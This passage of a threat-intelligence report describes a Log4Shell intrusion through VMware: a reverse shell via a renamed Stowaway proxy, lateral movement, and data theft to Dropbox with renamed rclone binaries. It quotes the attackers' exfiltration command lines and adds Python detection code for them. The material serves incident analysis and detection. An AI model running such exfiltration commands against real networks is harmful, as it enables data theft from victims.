Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware

Lateral movement to machines in the network
After the initial infection with Cobalt Strike, we observed that the threat actor dropped node.exe, a renamed copy of the Stowaway proxy tool, which is publicly available on GitHub. The tool is written in Go and gives threat actors many capabilities, including remote shell execution and file upload/download. In this case, the tool was used to provide a reverse shell to the threat actors' IP address 45[.]32.108.54 on port 80.
After a successful connection with the command and control (C&C) IP, we saw outbound traffic to several internal machines via SMB and WMI. The files mfeann.exe, Lockdown.DLL, and update.exe (accessed via the node.exe tool) were dropped on the identified internal machines.
Data exfiltration
In one case, we found an interesting binary file named update.exe. The file is actually the rclone.exe tool, used to exfiltrate data to a specific Dropbox location. While uploading the data, the Rclone tool connected to several Dropbox IP addresses over time:
162.125.1[.]14 (Dropbox, Inc.)
162.125.1[.]19 (Dropbox, Inc.)
162.125.2[.]14 (Dropbox, Inc.)
162.125.2[.]19 (Dropbox, Inc.)
162.125.7[.]14 (Dropbox, Inc.)
162.125.7[.]19 (Dropbox, Inc.)
CLI commands:
cmd.exe /Q /c update.exe copy J: 4:1 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649006901.3590112 2>&1
cmd.exe /Q /c update.exe copy L: 4:2 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649007703.966517 2>&1
cmd.exe /Q /c update.exe copy Q: 4:3 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649007856.0151849 2>&1
In another intrusion, the same tool was used for data exfiltration using a different name: Medias.exe.
Medias.exe copy "\\[Private IP]\G$" dropbox:ag -q --ignore-existing --max-age 2y --auto-confirm --multi-thread-streams 12 --transfers 10 --ignore-errors --exclude "*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}"
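Both intrusions left the same artifacts in process command lines: an rclone `copy` invocation under a renamed binary, a `remote:path` destination, and (in the first case) output redirected to `\\127.0.0.1\ADMIN$\__<epoch>`, the pattern left by WMI-based remote execution. The following detection logic is an added example, not part of the original report; it runs over constructed command lines modelled on the ones above (the internal IP 10.0.0.5, the `backup:nightly` remote and the admin job are assumed sample values) and returns the indicators a defender would triage.

```python
import re

# rclone verbs and flags seen in the report's update.exe / Medias.exe command lines
RCLONE_VERBS = {"copy", "sync", "move"}
RCLONE_FLAGS = {"--ignore-existing", "--max-age", "--exclude", "--auto-confirm",
                "--multi-thread-streams", "--transfers", "--ignore-errors"}
# rclone destinations use remote:path; a bare drive letter (J:) or C:\path is a local source
REMOTE_RE = re.compile(r"^[\w.-]+:(?![\\/])\S*$")
DRIVE_RE = re.compile(r"^[A-Za-z]:$")
# stdout/stderr redirected to \\127.0.0.1\ADMIN$\__<epoch>, as in the report's cmd.exe lines
WMIEXEC_RE = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+(\.\d+)?")

# Constructed sample command lines (not captured telemetry); the last two are benign controls
SAMPLE_CMDLINES = [
    r'cmd.exe /Q /c update.exe copy J: 4:1 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649006901.3590112 2>&1',
    r'Medias.exe copy "\\10.0.0.5\G$" dropbox:ag -q --ignore-existing --max-age 2y --auto-confirm --multi-thread-streams 12 --transfers 10 --ignore-errors --exclude "*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}"',
    r'rclone.exe copy C:\share backup:nightly --max-age 1d --exclude *.tmp',
    r'notepad.exe C:\Users\alice\notes.txt',
]

def tokenize(cmdline):
    # Split on whitespace but keep double-quoted arguments (UNC paths, globs) as one token
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def analyze(cmdline):
    """Return rclone-exfiltration indicators for one command line, or None if it does not match."""
    toks = tokenize(cmdline)
    # Peel off the cmd.exe /Q /c wrapper so the payload binary becomes the first token
    if toks and toks[0].lower() == "cmd.exe":
        toks = [t for t in toks[1:] if not t.startswith("/")]
    if not toks:
        return None
    binary = toks[0].lower()
    flags = {t.split("=")[0] for t in toks if t.startswith("--")} & RCLONE_FLAGS
    verb = next((t for t in toks[1:] if t in RCLONE_VERBS), None)
    # Require a transfer verb plus at least two rclone-specific flags to keep noise down
    if verb is None or len(flags) < 2:
        return None
    return {
        "binary": binary,
        "renamed": not binary.startswith("rclone"),   # update.exe / Medias.exe in the report
        "remotes": [t for t in toks if REMOTE_RE.match(t) and not DRIVE_RE.match(t)],
        "wmiexec_redirect": bool(WMIEXEC_RE.search(cmdline)),
    }

def scan(cmdlines):
    # Pair each matching command line with its indicators; non-matching lines are dropped
    return [(c, analyze(c)) for c in cmdlines if analyze(c) is not None]
```

Renamed rclone binaries combined with a `remote:path` destination are the strongest signal here; a stock `rclone.exe` with the same flags is reported too, but flagged as not renamed so that scheduled backup jobs can be allow-listed.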